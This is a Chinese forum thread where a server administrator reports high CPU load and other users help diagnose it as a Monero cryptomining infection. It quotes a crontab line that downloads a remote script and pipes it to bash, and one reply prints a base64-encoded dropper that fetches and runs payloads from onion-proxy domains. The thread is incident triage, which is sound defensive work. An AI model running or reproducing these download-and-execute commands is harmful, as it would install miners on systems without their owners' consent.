嘟嘟社区

[疑问] 公司这服务器是中了病毒吗?


本帖最后由 sizzlingbun 于 2021-12-21 16:29 编辑

cpu一直居高不下,就跟被挖了矿似得,用top查看有个git用户启动的rtkit-daemonl 程序,然后crontab里面有一行这样的命令。

*/2 * * * * (curl -fsSL http://xxx:8088/Adobe/conf||wget -q -O- http://xxx:8088/Adobe/conf||python -c ‘import urllib2 as fbi;print fbi.urlopen("http://xxx:8088/Adobe/conf").read()’)| bash -sh

——————————————————————————————————————————

破案了,确实是挂马了,谢谢各位大佬, 我去看了下,是挖门罗币的,服务器具体什么原因被攻破的还不知道,上面就一个gitlab,事发的时候在折腾gitlab runner,不知道是不是跟这个有关。

服务器配置很垃圾,算力低的可怜,应该是自动扫漏洞自动挖矿的吧? 附上挖矿日志:
[2021-12-21 15:51:27.707]  miner    speed 10s/60s/15m 88.56 88.64 88.72 H/s max 107.2 H/s
[2021-12-21 15:52:28.309]  miner    speed 10s/60s/15m 87.92 88.19 88.69 H/s max 107.2 H/s
[2021-12-21 15:53:28.821]  miner    speed 10s/60s/15m 89.12 88.00 88.59 H/s max 107.2 H/s
[2021-12-21 15:54:29.447]  miner    speed 10s/60s/15m 90.85 89.29 88.60 H/s max 107.2 H/s
[2021-12-21 15:55:30.045]  miner    speed 10s/60s/15m 88.95 89.56 88.65 H/s max 107.2 H/s
[2021-12-21 15:56:30.631]  miner    speed 10s/60s/15m 90.26 89.14 88.69 H/s max 107.2 H/s
[2021-12-21 15:57:31.201]  miner    speed 10s/60s/15m 89.68 88.56 88.65 H/s max 107.2 H/s
[2021-12-21 15:58:31.802]  miner    speed 10s/60s/15m 88.00 88.83 88.61 H/s max 107.2 H/s

Ricky.D. 发表于 2021-12-21 16:02
不用看了,已经被挂马了,你还替别人保护url呢

给犯罪嫌疑人脸部马赛克的既视感。。。。

rtkit-daemonl是d-bus的,但是你这个涉及到网络,不是太对劲,你看一下网址里面的具体内容
不用看了,已经被挂马了,你还替别人保护url呢
目测是被挂马了

loliwin 发表于 2021-12-21 16:03
给犯罪嫌疑人脸部马赛克的既视感。。。。

哈哈哈,有画面感了

学到了,以后就拿adobe做伪装
肯定被挂马了。改密码,删任务
只要不是root密码泄露就还好
[[email protected] ~]# cat /root/.titanagent.sh
#!/bin/bash
exec &>/dev/null
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10ZW5jZW50eGp5NWtwY2N2CmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluICRkaXIgL3RtcCAvdmFyL3RtcCAvZGV2L3NobSAvdXNyL2JpbiA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQp3Z2V0IC10MSAtVDk5IC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTk5IC1mc1NMa0EtICQxJGYgLW8kZApjaG1vZCAreCAkZDskZDtybSAtZiAkZAp9CnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDk5IC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCB8fCBjdXJsIC1tOTkgLWZzU0xrQS0gJDEkeAp9CmZvciBoIGluIGQyd2ViLm9yZyBvbmlvbi5tbiB0b3Iyd2ViLmlvIHRvcjJ3ZWIudG8gb25pb24udG8gb25pb24uaW4ubmV0IDR0b3IubWwgb25pb24uZ2xhc3MgY2l2aWNsaW5rLm5ldHdvcmsgdG9yMndlYi5zdSBvbmlvbi5seSBvbmlvbi5wZXQgb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMHxoZWFkIC1uIDEpL2lvOyB0aGVuCnggdGVuY2VudHhqeTVrcGNjdi4kaAplbHNlCmJyZWFrCmZpCmRvbmUKCmlmICEgbHMgL3Byb2MvJChjYXQgL3RtcC8uWDExLXVuaXgvMDB8aGVhZCAtbiAxKS9pbzsgdGhlbgooCnUgJHQuZDJ3ZWIub3JnIHx8CnUgJHQub25pb24ubW4gfHwKdSAkdC50b3Iyd2ViLmlvIHx8CnUgJHQudG9yMndlYi50byB8fAp1ICR0Lm9uaW9uLnRvIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQuNHRvci5tbCB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24ubHkgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash

Ricky.D. 发表于 2021-12-21 16:02
不用看了,已经被挂马了,你还替别人保护url呢

112.51.247.232  确实是挂了,一开始我不确定 不敢放